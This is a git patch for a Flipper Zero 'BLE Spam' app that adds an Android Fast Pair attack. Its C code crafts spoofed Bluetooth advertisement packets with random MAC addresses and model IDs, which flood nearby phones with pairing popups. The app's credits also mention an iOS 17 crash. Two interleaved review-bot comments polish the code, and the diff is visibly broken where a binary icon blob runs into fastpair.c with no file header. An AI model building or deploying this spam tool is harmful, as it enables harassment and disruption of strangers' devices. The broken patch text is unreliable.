From 74c3ab88d9409a8318cd276f3f6010d3edfcc740 Mon Sep 17 00:00:00 2001
From: Willy-JL <49810075+Willy-JL@users.noreply.github.com>
Date: Sun, 15 Oct 2023 18:53:31 +0100
Subject: [PATCH] BLE Spam add Android FastPair spam
Co-authored-by: Spooks <62370103+Spooks4576@users.noreply.github.com>
---
 .../external/ble_spam/application.fam | 2 +-
 applications/external/ble_spam/ble_spam.c | 18 ++++-
 .../external/ble_spam/icons/android.png | Bin 0 -> 5160 bytes
 .../external/ble_spam/protocols/_registry.c | 1 +
 .../external/ble_spam/protocols/_registry.h | 2 +
 .../external/ble_spam/protocols/fastpair.c | 72 ++++++++++++++++++
 .../external/ble_spam/protocols/fastpair.h | 11 +++
 7 files changed, 103 insertions(+), 3 deletions(-)
 create mode 100644 applications/external/ble_spam/icons/android.png
 create mode 100644 applications/external/ble_spam/protocols/fastpair.c
 create mode 100644 applications/external/ble_spam/protocols/fastpair.h
diff --git a/applications/external/ble_spam/application.fam b/applications/external/ble_spam/application.fam
index 1f0c019f1..d66dbeb14 100644
--- a/applications/external/ble_spam/application.fam
+++ b/applications/external/ble_spam/application.fam
@@ -6,7 +6,7 @@ App(
 stack_size=4 * 1024,
 fap_icon="ble_spam_10px.png",
 fap_category="Bluetooth",
- fap_author="@Willy-JL & @ECTO-1A",
+ fap_author="@Willy-JL @ECTO-1A @Spooks4576",
 fap_weburl="https://github.com/Flipper-XFW/Xtreme-Apps/tree/dev/ble_spam",
 fap_version="2.0",
 fap_description="Flood BLE advertisements to cause spammy and annoying popups/notifications",
diff --git a/applications/external/ble_spam/ble_spam.c b/applications/external/ble_spam/ble_spam.c
index 9a440471d..82903121a 100644
--- a/applications/external/ble_spam/ble_spam.c
+++ b/applications/external/ble_spam/ble_spam.c
@@ -7,7 +7,8 @@
 // Hacked together by @Willy-JL
 // Custom adv API by @Willy-JL (idea by @xMasterX)
 // iOS 17 Crash by @ECTO-1A
-// Research on behaviors and parameters by @Willy-JL and @ECTO-1A
+// Android Pairs by @Spooks4576 and @ECTO-1A
+// Research on behaviors and parameters by @Willy-JL, @ECTO-1A and @Spooks4576
 // Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam
 typedef struct {
@@ -84,6 +85,19 @@ static Attack attacks[] = {
 },
 },
 },
+ {
+ .title = "Android Device Pair",
+ .text = "~15min cooldown, long range",
+ .payload =
+ {
+ .random_mac = true,
+ .protocol = &ble_spam_protocol_fastpair,
+ .msg =
+ {
+ .fastpair = {},
+ },
+ },
+ },
 };
 #define ATTACK_COUNT ((signed)COUNT_OF(attacks))
@@ -242,7 +256,7 @@ static void draw_callback(Canvas* canvas, void* ctx) {
 AlignTop,
 "App+Spam: \e#WillyJL\e# XFW\n"
 "Apple+Crash: \e#ECTO-1A\e#\n"
- "\n"
+ "Android: \e#Spooks4576\e#\n"
 " Version \e#2.0\e#",
 false);
 break;
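Review bot: In the `attacks[]` hunk (`@@ -84,6 +85,19 @@`), the new entry leaves `.fastpair = {}` empty, so it depends on `model_id` being zero-initialised and on `fastpair_make_packet` in fastpair.c treating `0x000000` as "pick a random model"; nothing at this site says so. An empty `{}` initialiser is also a GNU extension before C23. I would spell the intent out as `.fastpair = {.model_id = 0x000000}, // 0 = random model from the built-in list`. The `attacks[]` array begins outside this hunk, so I cannot tell whether the existing entries follow the same convention.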
diff --git a/applications/external/ble_spam/icons/android.png b/applications/external/ble_spam/icons/android.png new file mode 100644 index 0000000000000000000000000000000000000000..efd5b28cbb8212ecec24933f6235c75c68c317b1 GIT binary patch literal 5160 zcmeHLeQXrR72gAc&82n&a#{q0TrQ!BA$vQ!JG-~L^Oxj zUu~qyD)5)@G&gT&-u&LY&zajNTUIw!`seu>hN+A-M_ZvUhvu)C3BQG7(Msq}(2kfD zi!Ej<+!==Pl`%e`Ts~ikcGpkyO=qS<|2VWcK)XC{o9CP1_1^({eu@4b(07-3+%>#! z8sm!E2~7aH8v36?v!5u+ItaA;sqnrBfSLhqq;HDFTLMCeMEN`1ufpbJ5bf7D^W$KD@Q7 zz4pPgT~6oFjmKf3FgIo}?vTCZ(?Zq?I;r<6VSYv*t3+l||W_bBiC@Mtt}741BHb zquV~d`0nCWs|&F+WhXuvR&IN1+3!Lpe)i?#mtQ`M*K8RQGcWz}lT$O%KVq8?>>Ye& z%faN(@T+@k9(eP775ck*bk7GX>t9&Di+TOU--pj{`E*0zmB0M+-9H?;FnwUxzSi)Y zhi*r$yFciCF@L%5!w)a*SpQJnqaE3OC!c%++%db%ZtHM5;;S^0PKI3*Hg6=V8LV6CuPtZ* zkfe?tC?pf9oK}bgJzNcFcbE$XJQinTB-jCA)R4~701n|0VjBx~pAcN?57cH&OKXj; zC_%teB-rCP8I9xe`FtoZhSJ$?j#pKcLjorVEO4;7{*?rwDbS06b&^PB@G#OA-l-OjTsDU;&t*$}FLZ zp{uGQ5|fOBSd+COD)q$pUAa)E3x!3DCCgwXf)o~qdCaPYYO*pyVmK@j15@llxqi^< zTVj!*5JF=kEeYMR(%EDrxXMoT7RDyp>?B?1=&sRtSq<~DgfQY&C5*@6t*6->1e}ZM zRY-5SNwgJ!s6*h`NxhqLnN+to;krcwWx%ky8>fKmje{;)Lze1JI@^{`CnCYoqB}Yr zhjcP^M~~_b1!<#YxNW2iFF`yM<1zlUXu&CQ360u37M3Ar_42Fu1Q&7Qp{7) zHD#_zSzuDkQ_*$J%;g_@wLw$xk0cK-E($e&It?#9W*T2Vi zhN(L2Hs5ngs^-IBxf6>wmjBgXIqe>%@ye%Pf*~yyt#6zA&fWoa4il)Dp1<|#)$<)M z{d{2MyrcDxAG-6*+MAXgI67Q8a8AI9(_Oc|mujEA{qtA2i)YFg#O7DeePY+!yIr}l N#?{e%%fIpPzX9_fastpair; + UNUSED(msg); + return "FastPair"; +} + +void fastpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) { + const FastpairMsg* msg = _msg ? 
&_msg->fastpair : NULL;
+
+ uint32_t model_id;
+ if(msg && msg->model_id != 0x000000) {
+ model_id = msg->model_id;
+ } else {
+ const uint32_t models[] = {
+ // Genuine devices
+ 0xCD8256, // Bose NC 700
+ 0xF52494, // JBL Buds Pro
+ 0x718FA4, // JBL Live 300TWS
+ 0x821F66, // JBL Flip 6
+ 0x92BBBD, // Pixel Buds
+
+ // Custom debug popups
+ 0xAA1FE1, // ClownMaster
+ 0xAA187F, // VBucks
+ 0xF38C02, // Boykisser
+ 0x1448C9, // BLM
+ 0xD5AB33, // Xtreme
+ 0x13B39D, // Talking Sasquach
+ };
+ model_id = models[rand() % COUNT_OF(models)];
+ }
+
+ uint8_t size = 17;
+ uint8_t* packet = malloc(size);
+ uint8_t i = 0;
+
+ packet[i++] = 2; // Size
+ packet[i++] = 0x01; // AD Type (Flags)
+ packet[i++] = 0x02 + (0x04 * (rand() % 2)); // GENERAL_DISC_MODE + maybe BR_EDR_NOT_SUPPORTED
+
+ packet[i++] = 3; // Size
+ packet[i++] = 0x03; // AD Type (Service UUID List)
+ packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
+ packet[i++] = 0xFE; // ...
+
+ packet[i++] = 6; // Size
+ packet[i++] = 0x16; // AD Type (Service Data)
+ packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
+ packet[i++] = 0xFE; // ...
+ packet[i++] = (model_id >> 0x10) & 0xFF; // Model ID
+ packet[i++] = (model_id >> 0x08) & 0xFF; // ...
+ packet[i++] = (model_id >> 0x00) & 0xFF; // ...
+
+ packet[i++] = 2; // Size
+ packet[i++] = 0x0A; // AD Type (Tx Power Level)
+ packet[i++] = (rand() % 120) - 100; // -100 to +20 dBm
+
+ *out_size = size;
+ *out_packet = packet;
+}
+
+const BleSpamProtocol ble_spam_protocol_fastpair = {
+ .icon = &I_android,
+ .get_name = fastpair_get_name,
+ .make_packet = fastpair_make_packet,
+};
diff --git a/applications/external/ble_spam/protocols/fastpair.h b/applications/external/ble_spam/protocols/fastpair.h
new file mode 100644
index 000000000..6555d0b6b
--- /dev/null
+++ b/applications/external/ble_spam/protocols/fastpair.h
@@ -0,0 +1,11 @@
+#pragma once
+#include "_base.h"
+
+// Hacked together by @Willy-JL and @Spooks4576
+// Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction
+
+typedef struct {
+ uint32_t model_id;
+} FastpairMsg;
+
+extern const BleSpamProtocol ble_spam_protocol_fastpair;
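Review bot: `FastpairMsg.model_id` is declared as a bare `uint32_t` with no comment on its valid range or on what zero means. In fastpair.c only the low 24 bits reach the service data (`model_id >> 0x10`, `>> 0x08`, `>> 0x00`), and `0x000000` selects a random entry from the built-in list, so any upper byte a caller sets is silently dropped. I would document the contract on the field: `uint32_t model_id; // 24-bit Fast Pair model ID; 0 = pick a random built-in model`. The header also uses `uint32_t` without including `<stdint.h>`, so it presumably relies on `_base.h` to provide it.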